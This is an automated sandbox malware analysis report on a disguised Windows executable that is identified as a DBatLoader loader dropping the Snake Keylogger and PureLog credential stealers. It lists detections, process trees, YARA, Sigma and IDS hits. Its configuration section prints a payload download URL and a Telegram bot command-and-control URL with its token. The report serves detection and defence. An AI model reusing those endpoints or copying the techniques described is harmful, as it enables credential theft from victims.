Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
D.G Governor Istek,Docx.exe

Overview

General Information

Sample name:D.G Governor Istek,Docx.exe
Analysis ID:1577649
MD5:7d212d2dab091bec36a906828d270c65
SHA1:4d251936d754c47ee58e3913a99e2659e731ac98
SHA256:4390ad0a5bd9184058cc6e2fbe64f896f71b0f0e95c27d8769837c6f979b11db
Tags:exeuser-Racco42
Infos:

Detection

DBatLoader, PureLog Stealer, Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DBatLoader
Yara detected PureLog Stealer
Yara detected Snake Keylogger
Yara detected Telegram RAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Allocates many large memory junks
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops PE files with a suspicious file extension
Sample is not signed and drops a device driver
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Suspicious Program Location with Network Connections
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • D.G Governor Istek,Docx.exe (PID: 1560 cmdline: "C:\Users\user\Desktop\D.G Governor Istek,Docx.exe" MD5: 7D212D2DAB091BEC36A906828D270C65)
    • cmd.exe (PID: 2140 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • xzeheenC.pif (PID: 6656 cmdline: C:\Users\Public\Libraries\xzeheenC.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • Cneehezx.PIF (PID: 3128 cmdline: "C:\Users\Public\Libraries\Cneehezx.PIF" MD5: 7D212D2DAB091BEC36A906828D270C65)
    • cmd.exe (PID: 6672 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • xzeheenC.pif (PID: 432 cmdline: C:\Users\Public\Libraries\xzeheenC.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • Cneehezx.PIF (PID: 5720 cmdline: "C:\Users\Public\Libraries\Cneehezx.PIF" MD5: 7D212D2DAB091BEC36A906828D270C65)
    • cmd.exe (PID: 6536 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • xzeheenC.pif (PID: 2140 cmdline: C:\Users\Public\Libraries\xzeheenC.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: DBatLoader

{"Download Url": ["https://bitbucket.org/ntim1478/gpmaw/downloads/202_Cneehezxuzj"]}

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendMessage"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.3435180894.0000000000400000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
  • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x1300:$s3: 83 EC 38 53 B0 99 88 44 24 2B 88 44 24 2F B0 72 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1fdd0:$s5: delete[]
  • 0x1f288:$s6: constructor or from DllMain.
00000004.00000002.3467561668.000000001CE1B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
    00000004.00000002.3467561668.000000001CE1B000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
    • 0x6a2ab:$a1: get_encryptedPassword
    • 0x6a27f:$a2: get_encryptedUsername
    • 0x6a343:$a3: get_timePasswordChanged
    • 0x6a25b:$a4: get_passwordField
    • 0x6a2c1:$a5: set_encryptedPassword
    • 0x6a08e:$a7: get_logins
    • 0x667cc:$a10: KeyLoggerEventArgs
    • 0x6679b:$a11: KeyLoggerEventArgsEventHandler
    • 0x6a162:$a13: _encryptedPassword
    00000004.00000002.3468357631.000000001D423000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      00000009.00000002.3474258234.0000000035551000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        Click to see the 89 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        4.2.xzeheenC.pif.400000.0.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
        • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
        • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
        • 0x1300:$s3: 83 EC 38 53 B0 99 88 44 24 2B 88 44 24 2F B0 72 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
        • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
        • 0x1fdd0:$s5: delete[]
        • 0x1f288:$s6: constructor or from DllMain.
        13.1.xzeheenC.pif.400000.0.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
        • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
        • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
        • 0x1300:$s3: 83 EC 38 53 B0 99 88 44 24 2B 88 44 24 2F B0 72 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
        • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
        • 0x1fdd0:$s5: delete[]
        • 0x1f288:$s6: constructor or from DllMain.
        13.2.xzeheenC.pif.31d76478.5.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          13.2.xzeheenC.pif.31d76478.5.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0x26c15:$a1: get_encryptedPassword
          • 0x26be9:$a2: get_encryptedUsername
          • 0x26cad:$a3: get_timePasswordChanged
          • 0x26bc5:$a4: get_passwordField
          • 0x26c2b:$a5: set_encryptedPassword
          • 0x269f8:$a7: get_logins
          • 0x23136:$a10: KeyLoggerEventArgs
          • 0x23105:$a11: KeyLoggerEventArgsEventHandler
          • 0x26acc:$a13: _encryptedPassword
          13.2.xzeheenC.pif.31d76478.5.unpackINDICATOR_SUSPICIOUS_EXE_DotNetProcHookDetects executables with potential process hoockingditekSHen
          • 0x2545d:$s1: UnHook
          • 0x253f9:$s2: SetHook
          • 0x25432:$s3: CallNextHook
          • 0x253c1:$s4: _hook
          Click to see the 188 entries

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
          Source: File createdAuthor: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe, ProcessId: 1560, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
          Sigma detected: Execution from Suspicious Folder
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Libraries\xzeheenC.pif, CommandLine: C:\Users\Public\Libraries\xzeheenC.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\xzeheenC.pif, NewProcessName: C:\Users\Public\Libraries\xzeheenC.pif, OriginalFileName: C:\Users\Public\Libraries\xzeheenC.pif, ParentCommandLine: "C:\Users\user\Desktop\D.G Governor Istek,Docx.exe", ParentImage: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe, ParentProcessId: 1560, ParentProcessName: D.G Governor Istek,Docx.exe, ProcessCommandLine: C:\Users\Public\Libraries\xzeheenC.pif, ProcessId: 6656, ProcessName: xzeheenC.pif
          Sigma detected: Files With System Process Name In Unsuspected Locations
          Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe, ProcessId: 1560, TargetFilename: C:\Windows \SysWOW64\svchost.exe
          Sigma detected: New RUN Key Pointing to Suspicious Folder
          Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Cneehezx.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe, ProcessId: 1560, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Cneehezx
          Sigma detected: Parent in Public Folder Suspicious Process
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, CommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\Public\Libraries\Cneehezx.PIF" , ParentImage: C:\Users\Public\Libraries\Cneehezx.PIF, ParentProcessId: 3128, ParentProcessName: Cneehezx.PIF, ProcessCommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, ProcessId: 6672, ProcessName: cmd.exe
          Sigma detected: Suspicious Program Location with Network Connections
          Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 132.226.247.73, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Users\Public\Libraries\xzeheenC.pif, Initiated: true, ProcessId: 6656, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49731
          Sigma detected: CurrentVersion Autorun Keys Modification
          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Cneehezx.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe, ProcessId: 1560, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Cneehezx
          Sigma detected: Execution of Suspicious File Type Extension
          Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\xzeheenC.pif, CommandLine: C:\Users\Public\Libraries\xzeheenC.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\xzeheenC.pif, NewProcessName: C:\Users\Public\Libraries\xzeheenC.pif, OriginalFileName: C:\Users\Public\Libraries\xzeheenC.pif, ParentCommandLine: "C:\Users\user\Desktop\D.G Governor Istek,Docx.exe", ParentImage: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe, ParentProcessId: 1560, ParentProcessName: D.G Governor Istek,Docx.exe, ProcessCommandLine: C:\Users\Public\Libraries\xzeheenC.pif, ProcessId: 6656, ProcessName: xzeheenC.pif

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-18T16:16:41.243953+010020283713Unknown Traffic192.168.2.549715185.166.143.49443TCP
          2024-12-18T16:16:43.767945+010020283713Unknown Traffic192.168.2.54971652.217.32.148443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-18T16:17:03.338310+010028530061A Network Trojan was detected192.168.2.549758149.154.167.220443TCP
          2024-12-18T16:17:16.849018+010028530061A Network Trojan was detected192.168.2.549782149.154.167.220443TCP
          2024-12-18T16:17:16.923059+010028530061A Network Trojan was detected192.168.2.549790149.154.167.220443TCP
          2024-12-18T16:17:21.087865+010028530061A Network Trojan was detected192.168.2.549799149.154.167.220443TCP
          2024-12-18T16:17:21.181072+010028530061A Network Trojan was detected192.168.2.549800149.154.167.220443TCP
          2024-12-18T16:17:28.765406+010028530061A Network Trojan was detected192.168.2.549812149.154.167.220443TCP
          2024-12-18T16:17:28.797810+010028530061A Network Trojan was detected192.168.2.549821149.154.167.220443TCP
          2024-12-18T16:17:34.391819+010028530061A Network Trojan was detected192.168.2.549829149.154.167.220443TCP
          2024-12-18T16:17:34.460372+010028530061A Network Trojan was detected192.168.2.549830149.154.167.220443TCP
          2024-12-18T16:17:34.509640+010028530061A Network Trojan was detected192.168.2.549835149.154.167.220443TCP
          2024-12-18T16:17:36.342503+010028530061A Network Trojan was detected192.168.2.549846149.154.167.220443TCP
          2024-12-18T16:17:36.437927+010028530061A Network Trojan was detected192.168.2.549848149.154.167.220443TCP
          2024-12-18T16:17:36.520487+010028530061A Network Trojan was detected192.168.2.549847149.154.167.220443TCP
          2024-12-18T16:17:49.390103+010028530061A Network Trojan was detected192.168.2.549854149.154.167.220443TCP
          2024-12-18T16:17:49.444271+010028530061A Network Trojan was detected192.168.2.549856149.154.167.220443TCP
          2024-12-18T16:17:49.481843+010028530061A Network Trojan was detected192.168.2.549857149.154.167.220443TCP
          2024-12-18T16:17:51.381717+010028530061A Network Trojan was detected192.168.2.549889149.154.167.220443TCP
          2024-12-18T16:17:51.459517+010028530061A Network Trojan was detected192.168.2.549888149.154.167.220443TCP
          2024-12-18T16:17:51.484603+010028530061A Network Trojan was detected192.168.2.549890149.154.167.220443TCP
          2024-12-18T16:17:53.305533+010028530061A Network Trojan was detected192.168.2.549896149.154.167.220443TCP
          2024-12-18T16:17:53.484345+010028530061A Network Trojan was detected192.168.2.549897149.154.167.220443TCP
          2024-12-18T16:17:53.506958+010028530061A Network Trojan was detected192.168.2.549898149.154.167.220443TCP
          2024-12-18T16:17:55.370908+010028530061A Network Trojan was detected192.168.2.549903149.154.167.220443TCP
          2024-12-18T16:17:55.483625+010028530061A Network Trojan was detected192.168.2.549904149.154.167.220443TCP
          2024-12-18T16:17:55.524486+010028530061A Network Trojan was detected192.168.2.549905149.154.167.220443TCP
          2024-12-18T16:17:57.380673+010028530061A Network Trojan was detected192.168.2.549911149.154.167.220443TCP
          2024-12-18T16:17:57.573416+010028530061A Network Trojan was detected192.168.2.549913149.154.167.220443TCP
          2024-12-18T16:17:57.635179+010028530061A Network Trojan was detected192.168.2.549912149.154.167.220443TCP
          2024-12-18T16:17:59.375673+010028530061A Network Trojan was detected192.168.2.549919149.154.167.220443TCP
          2024-12-18T16:17:59.580713+010028530061A Network Trojan was detected192.168.2.549920149.154.167.220443TCP
          2024-12-18T16:17:59.639880+010028530061A Network Trojan was detected192.168.2.549921149.154.167.220443TCP
          2024-12-18T16:18:01.318425+010028530061A Network Trojan was detected192.168.2.549926149.154.167.220443TCP
          2024-12-18T16:18:01.571029+010028530061A Network Trojan was detected192.168.2.549928149.154.167.220443TCP
          2024-12-18T16:18:01.603400+010028530061A Network Trojan was detected192.168.2.549929149.154.167.220443TCP
          2024-12-18T16:18:03.392072+010028530061A Network Trojan was detected192.168.2.549934149.154.167.220443TCP
          2024-12-18T16:18:03.529800+010028530061A Network Trojan was detected192.168.2.549936149.154.167.220443TCP
          2024-12-18T16:18:03.666271+010028530061A Network Trojan was detected192.168.2.549937149.154.167.220443TCP
          2024-12-18T16:18:05.349537+010028530061A Network Trojan was detected192.168.2.549941149.154.167.220443TCP
          2024-12-18T16:18:05.443772+010028530061A Network Trojan was detected192.168.2.549943149.154.167.220443TCP
          2024-12-18T16:18:05.612499+010028530061A Network Trojan was detected192.168.2.549944149.154.167.220443TCP
          2024-12-18T16:18:07.581908+010028530061A Network Trojan was detected192.168.2.549949149.154.167.220443TCP
          2024-12-18T16:18:07.680349+010028530061A Network Trojan was detected192.168.2.549950149.154.167.220443TCP
          2024-12-18T16:18:07.704153+010028530061A Network Trojan was detected192.168.2.549952149.154.167.220443TCP
          2024-12-18T16:18:09.708901+010028530061A Network Trojan was detected192.168.2.549958149.154.167.220443TCP
          2024-12-18T16:18:09.773344+010028530061A Network Trojan was detected192.168.2.549959149.154.167.220443TCP
          2024-12-18T16:18:09.810147+010028530061A Network Trojan was detected192.168.2.549960149.154.167.220443TCP
          2024-12-18T16:18:11.797610+010028530061A Network Trojan was detected192.168.2.549966149.154.167.220443TCP
          2024-12-18T16:18:11.812814+010028530061A Network Trojan was detected192.168.2.549968149.154.167.220443TCP
          2024-12-18T16:18:11.853841+010028530061A Network Trojan was detected192.168.2.549967149.154.167.220443TCP
          2024-12-18T16:18:14.047343+010028530061A Network Trojan was detected192.168.2.549973149.154.167.220443TCP
          2024-12-18T16:18:14.100657+010028530061A Network Trojan was detected192.168.2.549974149.154.167.220443TCP
          2024-12-18T16:18:14.154114+010028530061A Network Trojan was detected192.168.2.549976149.154.167.220443TCP
          2024-12-18T16:18:15.983634+010028530061A Network Trojan was detected192.168.2.549982149.154.167.220443TCP
          2024-12-18T16:18:16.111926+010028530061A Network Trojan was detected192.168.2.549983149.154.167.220443TCP
          2024-12-18T16:18:16.152443+010028530061A Network Trojan was detected192.168.2.549984149.154.167.220443TCP
          2024-12-18T16:18:17.915743+010028530061A Network Trojan was detected192.168.2.549989149.154.167.220443TCP
          2024-12-18T16:18:18.073303+010028530061A Network Trojan was detected192.168.2.549990149.154.167.220443TCP
          2024-12-18T16:18:18.111085+010028530061A Network Trojan was detected192.168.2.549991149.154.167.220443TCP
          2024-12-18T16:18:19.846297+010028530061A Network Trojan was detected192.168.2.549997149.154.167.220443TCP
          2024-12-18T16:18:20.045944+010028530061A Network Trojan was detected192.168.2.549998149.154.167.220443TCP
          2024-12-18T16:18:20.076195+010028530061A Network Trojan was detected192.168.2.549999149.154.167.220443TCP
          2024-12-18T16:18:21.927558+010028530061A Network Trojan was detected192.168.2.550004149.154.167.220443TCP
          2024-12-18T16:18:22.092437+010028530061A Network Trojan was detected192.168.2.550005149.154.167.220443TCP
          2024-12-18T16:18:22.120855+010028530061A Network Trojan was detected192.168.2.550007149.154.167.220443TCP
          2024-12-18T16:18:24.287503+010028530061A Network Trojan was detected192.168.2.550014149.154.167.220443TCP
          2024-12-18T16:18:24.288171+010028530061A Network Trojan was detected192.168.2.550012149.154.167.220443TCP
          2024-12-18T16:18:24.288771+010028530061A Network Trojan was detected192.168.2.550013149.154.167.220443TCP
          2024-12-18T16:18:26.252702+010028530061A Network Trojan was detected192.168.2.550020149.154.167.220443TCP
          2024-12-18T16:18:26.311353+010028530061A Network Trojan was detected192.168.2.550022149.154.167.220443TCP
          2024-12-18T16:18:26.366662+010028530061A Network Trojan was detected192.168.2.550021149.154.167.220443TCP
          2024-12-18T16:18:28.288311+010028530061A Network Trojan was detected192.168.2.550028149.154.167.220443TCP
          2024-12-18T16:18:28.333244+010028530061A Network Trojan was detected192.168.2.550029149.154.167.220443TCP
          2024-12-18T16:18:28.371274+010028530061A Network Trojan was detected192.168.2.550030149.154.167.220443TCP
          2024-12-18T16:18:30.205741+010028530061A Network Trojan was detected192.168.2.550037149.154.167.220443TCP
          2024-12-18T16:18:30.323151+010028530061A Network Trojan was detected192.168.2.550038149.154.167.220443TCP
          2024-12-18T16:18:30.356116+010028530061A Network Trojan was detected192.168.2.550039149.154.167.220443TCP
          2024-12-18T16:18:32.166367+010028530061A Network Trojan was detected192.168.2.550044149.154.167.220443TCP
          2024-12-18T16:18:32.380021+010028530061A Network Trojan was detected192.168.2.550045149.154.167.220443TCP
          2024-12-18T16:18:32.422146+010028530061A Network Trojan was detected192.168.2.550046149.154.167.220443TCP
          2024-12-18T16:18:34.245957+010028530061A Network Trojan was detected192.168.2.550049149.154.167.220443TCP
          2024-12-18T16:18:34.375883+010028530061A Network Trojan was detected192.168.2.550052149.154.167.220443TCP
          2024-12-18T16:18:34.414007+010028530061A Network Trojan was detected192.168.2.550053149.154.167.220443TCP
          2024-12-18T16:18:36.176798+010028530061A Network Trojan was detected192.168.2.550057149.154.167.220443TCP
          2024-12-18T16:18:36.335163+010028530061A Network Trojan was detected192.168.2.550058149.154.167.220443TCP
          2024-12-18T16:18:36.367743+010028530061A Network Trojan was detected192.168.2.550059149.154.167.220443TCP
          2024-12-18T16:18:38.112744+010028530061A Network Trojan was detected192.168.2.550065149.154.167.220443TCP
          2024-12-18T16:18:38.317119+010028530061A Network Trojan was detected192.168.2.550066149.154.167.220443TCP
          2024-12-18T16:18:38.348443+010028530061A Network Trojan was detected192.168.2.550067149.154.167.220443TCP
          2024-12-18T16:18:40.032364+010028530061A Network Trojan was detected192.168.2.550072149.154.167.220443TCP
          2024-12-18T16:18:40.250609+010028530061A Network Trojan was detected192.168.2.550073149.154.167.220443TCP
          2024-12-18T16:18:40.297416+010028530061A Network Trojan was detected192.168.2.550074149.154.167.220443TCP
          2024-12-18T16:18:41.997405+010028530061A Network Trojan was detected192.168.2.550080149.154.167.220443TCP
          2024-12-18T16:18:42.351105+010028530061A Network Trojan was detected192.168.2.550081149.154.167.220443TCP
          2024-12-18T16:18:42.395242+010028530061A Network Trojan was detected192.168.2.550082149.154.167.220443TCP
          2024-12-18T16:18:43.931774+010028530061A Network Trojan was detected192.168.2.550087149.154.167.220443TCP
          2024-12-18T16:18:44.349926+010028530061A Network Trojan was detected192.168.2.550089149.154.167.220443TCP
          2024-12-18T16:18:45.072902+010028530061A Network Trojan was detected192.168.2.550090149.154.167.220443TCP
          2024-12-18T16:18:45.842958+010028530061A Network Trojan was detected192.168.2.550094149.154.167.220443TCP
          2024-12-18T16:18:46.296362+010028530061A Network Trojan was detected192.168.2.550096149.154.167.220443TCP
          2024-12-18T16:18:47.101890+010028530061A Network Trojan was detected192.168.2.550098149.154.167.220443TCP
          2024-12-18T16:18:51.477554+010028530061A Network Trojan was detected192.168.2.550100149.154.167.220443TCP
          2024-12-18T16:18:51.722173+010028530061A Network Trojan was detected192.168.2.550104149.154.167.220443TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus / Scanner detection for submitted sample
          Source: D.G Governor Istek,Docx.exeAvira: detected
          Antivirus detection for dropped file
          Source: C:\Users\Public\Libraries\Cneehezx.PIFAvira: detection malicious, Label: HEUR/AGEN.1326111
          Found malware configuration
          Source: D.G Governor Istek,Docx.exeMalware Configuration Extractor: DBatLoader {"Download Url": ["https://bitbucket.org/ntim1478/gpmaw/downloads/202_Cneehezxuzj"]}
          Source: xzeheenC.pif.6656.4.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendMessage"}
          Multi AV Scanner detection for dropped file
          Source: C:\Users\Public\Libraries\Cneehezx.PIFReversingLabs: Detection: 52%
          Multi AV Scanner detection for submitted file
          Source: D.G Governor Istek,Docx.exeReversingLabs: Detection: 52%
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

          Compliance

          barindex
          Detected unpacking (overwrites its own PE header)
          Source: C:\Users\Public\Libraries\xzeheenC.pifUnpacked PE file: 4.2.xzeheenC.pif.400000.0.unpack
          Source: C:\Users\Public\Libraries\xzeheenC.pifUnpacked PE file: 9.2.xzeheenC.pif.400000.0.unpack
          Source: C:\Users\Public\Libraries\xzeheenC.pifUnpacked PE file: 13.2.xzeheenC.pif.400000.0.unpack
          Source: D.G Governor Istek,Docx.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
          Source: unknownHTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.5:49715 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 52.217.32.148:443 -> 192.168.2.5:49716 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49758 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49782 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49799 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50080 version: TLS 1.2
